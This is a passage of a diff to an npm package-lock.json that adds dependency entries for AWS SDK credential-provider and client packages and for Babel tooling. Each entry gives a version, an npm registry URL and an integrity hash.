"^3.0.0", + "@aws-sdk/types": "^3.222.0", + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/sha256-js/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-crypto/supports-web-crypto": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/supports-web-crypto/-/supports-web-crypto-3.0.0.tgz", + "integrity": "sha512-06hBdMwUAb2WFTuGG73LSC0wfPu93xWwo5vL2et9eymgmu3Id5vFAHBbajVWiGhPO37qcsdCap/FqXvJGJWPIg==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/supports-web-crypto/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-crypto/util": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/util/-/util-3.0.0.tgz", + "integrity": "sha512-2OJlpeJpCR48CC8r+uKVChzs9Iungj9wkZrl8Z041DWEWvyIHILYKCPNzJghKsivj+S3mLo6BVc7mBNzdxA46w==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "^3.222.0", + "@aws-sdk/util-utf8-browser": "^3.0.0", + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/util/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-sdk/client-cognito-identity": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-cognito-identity/-/client-cognito-identity-3.363.0.tgz", + "integrity": "sha512-tsJzgBSCpna85IVsuS7FBIK9wkSl7fs8TJ/QzapIgu8rKss0ySHVO6TeMVAdw2BvaQl7CxU9c3PosjhLWHu6KQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/sha256-browser": "3.0.0", + "@aws-crypto/sha256-js": "3.0.0", + "@aws-sdk/client-sts": "3.363.0", + "@aws-sdk/credential-provider-node": "3.363.0", + "@aws-sdk/middleware-host-header": "3.363.0", + "@aws-sdk/middleware-logger": "3.363.0", + "@aws-sdk/middleware-recursion-detection": "3.363.0", + "@aws-sdk/middleware-signing": "3.363.0", + "@aws-sdk/middleware-user-agent": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@aws-sdk/util-endpoints": "3.357.0", + "@aws-sdk/util-user-agent-browser": "3.363.0", + "@aws-sdk/util-user-agent-node": "3.363.0", + "@smithy/config-resolver": "^1.0.1", + "@smithy/fetch-http-handler": "^1.0.1", + "@smithy/hash-node": "^1.0.1", + "@smithy/invalid-dependency": "^1.0.1", + "@smithy/middleware-content-length": "^1.0.1", + "@smithy/middleware-endpoint": "^1.0.1", + "@smithy/middleware-retry": "^1.0.2", + "@smithy/middleware-serde": "^1.0.1", + "@smithy/middleware-stack": "^1.0.1", + "@smithy/node-config-provider": "^1.0.1", + "@smithy/node-http-handler": "^1.0.2", + "@smithy/protocol-http": "^1.0.1", + "@smithy/smithy-client": "^1.0.3", + "@smithy/types": "^1.0.0", + "@smithy/url-parser": "^1.0.1", + "@smithy/util-base64": "^1.0.1", + "@smithy/util-body-length-browser": "^1.0.1", + "@smithy/util-body-length-node": "^1.0.1", + "@smithy/util-defaults-mode-browser": "^1.0.1", + "@smithy/util-defaults-mode-node": "^1.0.1", + "@smithy/util-retry": "^1.0.2", + "@smithy/util-utf8": "^1.0.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/client-sso": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-sso/-/client-sso-3.363.0.tgz", + "integrity": "sha512-PZ+HfKSgS4hlMnJzG+Ev8/mgHd/b/ETlJWPSWjC/f2NwVoBQkBnqHjdyEx7QjF6nksJozcVh5Q+kkYLKc/QwBQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/sha256-browser": "3.0.0", + "@aws-crypto/sha256-js": "3.0.0", + "@aws-sdk/middleware-host-header": "3.363.0", + "@aws-sdk/middleware-logger": "3.363.0", + "@aws-sdk/middleware-recursion-detection": "3.363.0", + "@aws-sdk/middleware-user-agent": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@aws-sdk/util-endpoints": "3.357.0", + "@aws-sdk/util-user-agent-browser": "3.363.0", + "@aws-sdk/util-user-agent-node": "3.363.0", + "@smithy/config-resolver": "^1.0.1", + "@smithy/fetch-http-handler": "^1.0.1", + "@smithy/hash-node": "^1.0.1", + "@smithy/invalid-dependency": "^1.0.1", + "@smithy/middleware-content-length": "^1.0.1", + "@smithy/middleware-endpoint": "^1.0.1", + "@smithy/middleware-retry": "^1.0.2", + "@smithy/middleware-serde": "^1.0.1", + "@smithy/middleware-stack": "^1.0.1", + "@smithy/node-config-provider": "^1.0.1", + "@smithy/node-http-handler": "^1.0.2", + "@smithy/protocol-http": "^1.0.1", + "@smithy/smithy-client": "^1.0.3", + "@smithy/types": "^1.0.0", + "@smithy/url-parser": "^1.0.1", + "@smithy/util-base64": "^1.0.1", + "@smithy/util-body-length-browser": "^1.0.1", + "@smithy/util-body-length-node": "^1.0.1", + "@smithy/util-defaults-mode-browser": "^1.0.1", + "@smithy/util-defaults-mode-node": "^1.0.1", + "@smithy/util-retry": "^1.0.2", + "@smithy/util-utf8": "^1.0.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/client-sso-oidc": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-sso-oidc/-/client-sso-oidc-3.363.0.tgz", + "integrity": "sha512-V3Ebiq/zNtDS/O92HUWGBa7MY59RYSsqWd+E0XrXv6VYTA00RlMTbNcseivNgp2UghOgB9a20Nkz6EqAeIN+RQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/sha256-browser": "3.0.0", + "@aws-crypto/sha256-js": "3.0.0", + "@aws-sdk/middleware-host-header": "3.363.0", + "@aws-sdk/middleware-logger": "3.363.0", + "@aws-sdk/middleware-recursion-detection": "3.363.0", + "@aws-sdk/middleware-user-agent": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@aws-sdk/util-endpoints": "3.357.0", + "@aws-sdk/util-user-agent-browser": "3.363.0", + "@aws-sdk/util-user-agent-node": "3.363.0", + "@smithy/config-resolver": "^1.0.1", + "@smithy/fetch-http-handler": "^1.0.1", + "@smithy/hash-node": "^1.0.1", + "@smithy/invalid-dependency": "^1.0.1", + "@smithy/middleware-content-length": "^1.0.1", + "@smithy/middleware-endpoint": "^1.0.1", + "@smithy/middleware-retry": "^1.0.2", + "@smithy/middleware-serde": "^1.0.1", + "@smithy/middleware-stack": "^1.0.1", + "@smithy/node-config-provider": "^1.0.1", + "@smithy/node-http-handler": "^1.0.2", + "@smithy/protocol-http": "^1.0.1", + "@smithy/smithy-client": "^1.0.3", + "@smithy/types": "^1.0.0", + "@smithy/url-parser": "^1.0.1", + "@smithy/util-base64": "^1.0.1", + "@smithy/util-body-length-browser": "^1.0.1", + "@smithy/util-body-length-node": "^1.0.1", + "@smithy/util-defaults-mode-browser": "^1.0.1", + "@smithy/util-defaults-mode-node": "^1.0.1", + "@smithy/util-retry": "^1.0.2", + "@smithy/util-utf8": "^1.0.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/client-sts": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-sts/-/client-sts-3.363.0.tgz", + "integrity": "sha512-0jj14WvBPJQ8xr72cL0mhlmQ90tF0O0wqXwSbtog6PsC8+KDE6Yf+WsxsumyI8E5O8u3eYijBL+KdqG07F/y/w==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/sha256-browser": "3.0.0", + "@aws-crypto/sha256-js": "3.0.0", + "@aws-sdk/credential-provider-node": "3.363.0", + "@aws-sdk/middleware-host-header": "3.363.0", + "@aws-sdk/middleware-logger": "3.363.0", + "@aws-sdk/middleware-recursion-detection": "3.363.0", + "@aws-sdk/middleware-sdk-sts": "3.363.0", + "@aws-sdk/middleware-signing": "3.363.0", + "@aws-sdk/middleware-user-agent": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@aws-sdk/util-endpoints": "3.357.0", + "@aws-sdk/util-user-agent-browser": "3.363.0", + "@aws-sdk/util-user-agent-node": "3.363.0", + "@smithy/config-resolver": "^1.0.1", + "@smithy/fetch-http-handler": "^1.0.1", + "@smithy/hash-node": "^1.0.1", + "@smithy/invalid-dependency": "^1.0.1", + "@smithy/middleware-content-length": "^1.0.1", + "@smithy/middleware-endpoint": "^1.0.1", + "@smithy/middleware-retry": "^1.0.1", + "@smithy/middleware-serde": "^1.0.1", + "@smithy/middleware-stack": "^1.0.1", + "@smithy/node-config-provider": "^1.0.1", + "@smithy/node-http-handler": "^1.0.1", + "@smithy/protocol-http": "^1.1.0", + "@smithy/smithy-client": "^1.0.2", + "@smithy/types": "^1.1.0", + "@smithy/url-parser": "^1.0.1", + "@smithy/util-base64": "^1.0.1", + "@smithy/util-body-length-browser": "^1.0.1", + "@smithy/util-body-length-node": "^1.0.1", + "@smithy/util-defaults-mode-browser": "^1.0.1", + "@smithy/util-defaults-mode-node": "^1.0.1", + "@smithy/util-retry": "^1.0.1", + "@smithy/util-utf8": "^1.0.1", + "fast-xml-parser": "4.2.5", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-cognito-identity": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-cognito-identity/-/credential-provider-cognito-identity-3.363.0.tgz", + "integrity": "sha512-5x42JvqEsBUrm6/qdf0WWe4mlmJjPItxamQhRjuOzeQD/BxsA2W5VS/7n0Ws0e27DNhlnUErcIJd+bBy6j1fqA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/client-cognito-identity": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-env": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-env/-/credential-provider-env-3.363.0.tgz", + "integrity": "sha512-VAQ3zITT2Q0acht0HezouYnMFKZ2vIOa20X4zQA3WI0HfaP4D6ga6KaenbDcb/4VFiqfqiRHfdyXHP0ThcDRMA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-ini": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-ini/-/credential-provider-ini-3.363.0.tgz", + "integrity": "sha512-ZYN+INoqyX5FVC3rqUxB6O8nOWkr0gHRRBm1suoOlmuFJ/WSlW/uUGthRBY5x1AQQnBF8cpdlxZzGHd41lFVNw==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/credential-provider-env": "3.363.0", + "@aws-sdk/credential-provider-process": "3.363.0", + "@aws-sdk/credential-provider-sso": "3.363.0", + "@aws-sdk/credential-provider-web-identity": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/credential-provider-imds": "^1.0.1", + "@smithy/property-provider": "^1.0.1", + "@smithy/shared-ini-file-loader": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-node": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-node/-/credential-provider-node-3.363.0.tgz", + "integrity": "sha512-C1qXFIN2yMxD6pGgug0vR1UhScOki6VqdzuBHzXZAGu7MOjvgHNdscEcb3CpWnITHaPL2ztkiw75T1sZ7oIgQg==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/credential-provider-env": "3.363.0", + "@aws-sdk/credential-provider-ini": "3.363.0", + "@aws-sdk/credential-provider-process": "3.363.0", + "@aws-sdk/credential-provider-sso": "3.363.0", + "@aws-sdk/credential-provider-web-identity": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/credential-provider-imds": "^1.0.1", + "@smithy/property-provider": "^1.0.1", + "@smithy/shared-ini-file-loader": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-process": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-process/-/credential-provider-process-3.363.0.tgz", + "integrity": "sha512-fOKAINU7Rtj2T8pP13GdCt+u0Ml3gYynp8ki+1jMZIQ+Ju/MdDOqZpKMFKicMn3Z1ttUOgqr+grUdus6z8ceBQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/shared-ini-file-loader": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-sso": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-sso/-/credential-provider-sso-3.363.0.tgz", + "integrity": "sha512-5RUZ5oM0lwZSo3EehT0dXggOjgtxFogpT3cZvoLGtIwrPBvm8jOQPXQUlaqCj10ThF1sYltEyukz/ovtDwYGew==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/client-sso": "3.363.0", + "@aws-sdk/token-providers": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/shared-ini-file-loader": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-web-identity": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-web-identity/-/credential-provider-web-identity-3.363.0.tgz", + "integrity": "sha512-Z6w7fjgy79pAax580wdixbStQw10xfyZ+hOYLcPudoYFKjoNx0NQBejg5SwBzCF/HQL23Ksm9kDfbXDX9fkPhA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-providers": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-providers/-/credential-providers-3.363.0.tgz", + "integrity": "sha512-hVa1DdYasnLud2EKjDAlDHiV/+H/Zq52chHU00c/R8XwPu1s0kZX3NMmlt0D2HhYqC1mUwtdmE58Jra2POviQQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/client-cognito-identity": "3.363.0", + "@aws-sdk/client-sso": "3.363.0", + "@aws-sdk/client-sts": "3.363.0", + "@aws-sdk/credential-provider-cognito-identity": "3.363.0", + "@aws-sdk/credential-provider-env": "3.363.0", + "@aws-sdk/credential-provider-ini": "3.363.0", + "@aws-sdk/credential-provider-node": "3.363.0", + "@aws-sdk/credential-provider-process": "3.363.0", + "@aws-sdk/credential-provider-sso": "3.363.0", + "@aws-sdk/credential-provider-web-identity": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/credential-provider-imds": "^1.0.1", + "@smithy/property-provider": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-host-header": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-host-header/-/middleware-host-header-3.363.0.tgz", + "integrity": "sha512-FobpclDCf5Y1ueyJDmb9MqguAdPssNMlnqWQpujhYVABq69KHu73fSCWSauFPUrw7YOpV8kG1uagDF0POSxHzA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/protocol-http": "^1.1.0", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-logger": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-logger/-/middleware-logger-3.363.0.tgz", + "integrity": "sha512-SSGgthScYnFGTOw8EzbkvquqweFmvn7uJihkpFekbtBNGC/jGOGO+8ziHjTQ8t/iI/YKubEwv+LMi0f77HKSEg==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-recursion-detection": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-recursion-detection/-/middleware-recursion-detection-3.363.0.tgz", + "integrity": "sha512-MWD/57QgI/N7fG8rtzDTUdSqNpYohQfgj9XCFAoVeI/bU4usrkOrew43L4smJG4XrDxlNT8lSJlDtd64tuiUZA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/protocol-http": "^1.1.0", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-sdk-sts": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-sdk-sts/-/middleware-sdk-sts-3.363.0.tgz", + "integrity": "sha512-1yy2Ac50FO8BrODaw5bPWvVrRhaVLqXTFH6iHB+dJLPUkwtY5zLM3Mp+9Ilm7kME+r7oIB1wuO6ZB1Lf4ZszIw==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/middleware-signing": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-signing": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-signing/-/middleware-signing-3.363.0.tgz", + "integrity": "sha512-/7qia715pt9JKYIPDGu22WmdZxD8cfF/5xB+1kmILg7ZtjO0pPuTaCNJ7xiIuFd7Dn7JXp5lop08anX/GOhNRQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/protocol-http": "^1.1.0", + "@smithy/signature-v4": "^1.0.1", + "@smithy/types": "^1.1.0", + "@smithy/util-middleware": "^1.0.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-user-agent": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-user-agent/-/middleware-user-agent-3.363.0.tgz", + "integrity": "sha512-ri8YaQvXP6odteVTMfxPqFR26Q0h9ejtqhUDv47P34FaKXedEM4nC6ix6o+5FEYj6l8syGyktftZ5O70NoEhug==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@aws-sdk/util-endpoints": "3.357.0", + "@smithy/protocol-http": "^1.1.0", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/token-providers": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/token-providers/-/token-providers-3.363.0.tgz", + "integrity": "sha512-6+0aJ1zugNgsMmhTtW2LBWxOVSaXCUk2q3xyTchSXkNzallYaRiZMRkieW+pKNntnu0g5H1T0zyfCO0tbXwxEA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/client-sso-oidc": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/shared-ini-file-loader": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/types": { + "version": "3.357.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/types/-/types-3.357.0.tgz", + "integrity": "sha512-/riCRaXg3p71BeWnShrai0y0QTdXcouPSM0Cn1olZbzTf7s71aLEewrc96qFrL70XhY4XvnxMpqQh+r43XIL3g==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/util-endpoints": { + "version": "3.357.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-endpoints/-/util-endpoints-3.357.0.tgz", + "integrity": "sha512-XHKyS5JClT9su9hDif715jpZiWHQF9gKZXER8tW0gOizU3R9cyWc9EsJ2BRhFNhi7nt/JF/CLUEc5qDx3ETbUw==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/util-locate-window": { + "version": "3.310.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-locate-window/-/util-locate-window-3.310.0.tgz", + "integrity": "sha512-qo2t/vBTnoXpjKxlsC2e1gBrRm80M3bId27r0BRB2VniSSe7bL1mmzM+/HFtujm0iAxtPM+aLEflLJlJeDPg0w==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/util-user-agent-browser": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-browser/-/util-user-agent-browser-3.363.0.tgz", + "integrity": "sha512-fk9ymBUIYbxiGm99Cn+kAAXmvMCWTf/cHAcB79oCXV4ELXdPa9lN5xQhZRFNxLUeXG4OAMEuCAUUuZEj8Fnc1Q==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/types": "^1.1.0", + "bowser": "^2.11.0", + "tslib": "^2.5.0" + } + }, + "node_modules/@aws-sdk/util-user-agent-node": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-node/-/util-user-agent-node-3.363.0.tgz", + "integrity": "sha512-Fli/dvgGA9hdnQUrYb1//wNSFlK2jAfdJcfNXA6SeBYzSeH5pVGYF4kXF0FCdnMA3Fef+Zn1zAP/hw9v8VJHWQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/node-config-provider": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "aws-crt": ">=1.0.0" + }, + "peerDependenciesMeta": { + "aws-crt": { + "optional": true + } + } + }, + "node_modules/@aws-sdk/util-utf8-browser": { + "version": "3.259.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-utf8-browser/-/util-utf8-browser-3.259.0.tgz", + "integrity": "sha512-UvFa/vR+e19XookZF8RzFZBrw2EUkQWxiBW0yYQAhvk3C+QVGl0H3ouca8LDBlBfQKXwmW3huo/59H8rwb1wJw==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^2.3.1" + } + }, + "node_modules/@babel/cli": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/cli/-/cli-7.24.8.tgz", + "integrity": "sha512-isdp+G6DpRyKc+3Gqxy2rjzgF7Zj9K0mzLNnxz+E/fgeag8qT3vVulX4gY9dGO1q0y+0lUv6V3a+uhUzMzrwXg==", + "dev": true, + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.25", + "commander": "^6.2.0", + "convert-source-map": "^2.0.0", + "fs-readdir-recursive": "^1.1.0", + "glob": "^7.2.0", + "make-dir": "^2.1.0", + "slash": "^2.0.0" + }, + "bin": { + "babel": "bin/babel.js", + "babel-external-helpers": "bin/babel-external-helpers.js" + }, + "engines": { + "node": ">=6.9.0" + }, + "optionalDependencies": { + "@nicolo-ribaudo/chokidar-2": "2.1.8-no-fsevents.3", + "chokidar": "^3.4.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/cli/node_modules/commander": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-6.2.1.tgz", + "integrity": "sha512-U7VdrJFnJgo4xjrHpTzu0yrHPGImdsmD95ZlgYSEajAn2JKzDhDTPG9kBTefmObL2w/ngeZnilk+OV9CG3d7UA==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/@babel/cli/node_modules/convert-source-map": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", + "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", + "dev": true + }, + "node_modules/@babel/code-frame": { + "version": "7.26.2", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", + "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/helper-validator-identifier": "^7.25.9", + "js-tokens": "^4.0.0", + "picocolors": "^1.0.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/compat-data": { + "version": "7.26.8", + "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.8.tgz", + "integrity": "sha512-oH5UPLMWR3L2wEFLnFJ1TZXqHufiTKAiLfqw5zkhS4dKXLJ10yVztfil/twG8EDTA4F/tvVNw9nOl4ZMslB8rQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/core": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.9.tgz", + "integrity": "sha512-lWBYIrF7qK5+GjY5Uy+/hEgp8OJWOD/rpy74GplYRhEauvbHDeFB8t5hPOZxCZ0Oxf4Cc36tK51/l3ymJysrKw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@ampproject/remapping": "^2.2.0", + "@babel/code-frame": "^7.26.2", + "@babel/generator": "^7.26.9", + "@babel/helper-compilation-targets": "^7.26.5", + "@babel/helper-module-transforms": "^7.26.0", + "@babel/helpers": "^7.26.9", + "@babel/parser": "^7.26.9", + "@babel/template": "^7.26.9", + "@babel/traverse": "^7.26.9", + "@babel/types": "^7.26.9", + "convert-source-map": "^2.0.0", + "debug": "^4.1.0", + "gensync": "^1.0.0-beta.2", + "json5": "^2.2.3", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/babel" + } + }, + "node_modules/@babel/core/node_modules/convert-source-map": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", + "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", + "dev": true + }, + "node_modules/@babel/generator": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.9.tgz", + "integrity": "sha512-kEWdzjOAUMW4hAyrzJ0ZaTOu9OmpyDIQicIh0zg0EEcEkYXZb2TjtBhnHi2ViX7PKwZqF4xwqfAm299/QMP3lg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.26.9", + "@babel/types": "^7.26.9", + "@jridgewell/gen-mapping": "^0.3.5", + "@jridgewell/trace-mapping": "^0.3.25", + "jsesc": "^3.0.2" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-annotate-as-pure": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/helper-annotate-as-pure/-/helper-annotate-as-pure-7.24.7.tgz", + "integrity": "sha512-BaDeOonYvhdKw+JoMVkAixAAJzG2jVPIwWoKBPdYuY9b452e2rPuI9QPYh3KpofZ3pW2akOmwZLOiOsHMiqRAg==", + "dev": true, + "dependencies": { + "@babel/types": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-builder-binary-assignment-operator-visitor": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/helper-builder-binary-assignment-operator-visitor/-/helper-builder-binary-assignment-operator-visitor-7.24.7.tgz", + "integrity": 